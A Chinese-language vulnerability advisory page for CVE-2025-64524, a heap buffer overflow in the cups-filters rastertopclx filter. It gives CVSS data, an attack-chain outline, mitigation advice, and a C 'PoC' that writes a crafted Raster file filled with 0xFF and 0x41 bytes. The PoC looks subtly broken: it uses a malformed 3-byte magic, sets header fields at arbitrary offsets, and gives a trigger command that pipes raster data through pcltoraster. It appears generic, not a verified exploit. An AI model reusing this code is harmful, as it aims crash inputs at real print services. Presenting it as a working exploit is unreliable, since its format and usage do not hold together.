CVE-2025-64524 CVSS 3.3 低危

CVE-2025-64524 cups-filters rastertopclx堆缓冲区溢出漏洞

披露日期: 2025-11-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64524

漏洞类型

堆缓冲区溢出

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

cups-filters

漏洞概述

cups-filters是一个开源的打印过滤器组件，提供了在非macOS操作系统上运行CUPS打印服务所需的后端、过滤器和其他软件。该组件的rastertopclx过滤器中存在一个堆缓冲区溢出漏洞。在2.0.1及之前版本中，当rastertopclx过滤器处理恶意构造的输入数据时，会触发堆缓冲区溢出，导致程序崩溃并产生段错误。此漏洞可被利用来触发内存损坏，进而可能实现任意代码执行。攻击者需要具备本地访问权限，且无需用户交互即可触发该漏洞。漏洞已在commit 956283c中修复。

技术细节

该漏洞存在于cups-filters的rastertopclx过滤器中，具体是rastertopclx.c文件内的内存处理逻辑。当过滤器解析恶意构造的Raster格式数据并转换为PCL X格式时，由于缺乏适当的边界检查，导致堆缓冲区溢出。攻击者可以通过构造包含超长字段或畸形数据的Raster文件，触发内存越界写入或读取。成功利用此漏洞可能导致进程崩溃（拒绝服务）或在特定条件下实现代码执行。由于攻击向量为本地（AV:L），需要攻击者具备本地访问权限才能利用此漏洞。CVSS 3.1评分为3.3（低危），主要影响可用性，机密性和完整性影响较低。

攻击链分析

STEP 1

步骤1

攻击者获取cups-filters 2.0.1或更早版本的访问权限

STEP 2

步骤2

攻击者创建包含恶意构造数据的Raster格式文件

STEP 3

步骤3

通过打印作业或rastertopclx过滤器处理该恶意文件

STEP 4

步骤4

rastertopclx过滤器在解析Raster数据时触发堆缓冲区溢出

STEP 5

步骤5

程序崩溃（段错误）或在特定条件下攻击者实现代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// PoC for CVE-2025-64524: cups-filters rastertopclx heap-buffer-overflow
// This PoC generates a malicious Raster file that triggers overflow in rastertopclx

void generate_malicious_raster(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to open file");
        return;
    }
    
    // Raster header - crafted to trigger buffer overflow
    unsigned char raster_header[1024] = {0};
    
    // Set Raster magic number
    memcpy(raster_header, "RaS", 3);
    
    // Set version and dimensions to trigger overflow in rastertopclx
    raster_header[3] = 2;  // version
    raster_header[4] = 1;  // compression type
    
    // Write oversized data to cause heap overflow
    memset(raster_header + 100, 0xFF, 900);
    
    fwrite(raster_header, 1, sizeof(raster_header), fp);
    
    // Write additional malicious payload
    unsigned char payload[4096];
    memset(payload, 0x41, sizeof(payload));
    fwrite(payload, 1, sizeof(payload), fp);
    
    fclose(fp);
    printf("Malicious Raster file generated: %s\n", filename);
}

int main() {
    const char *poc_file = "CVE-2025-64524.poc";
    generate_malicious_raster(poc_file);
    printf("To trigger the vulnerability, process this file with rastertopclx:\n");
    printf("pcltoraster < %s | rastertopclx > output.pcl\n", poc_file);
    return 0;
}

影响范围

cups-filters <= 2.0.1

防御指南

临时缓解措施

立即升级cups-filters到2.0.2或更高版本。如无法立即升级，可暂时限制非授权用户访问CUPS打印服务，并监控系统日志中的异常打印作业。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表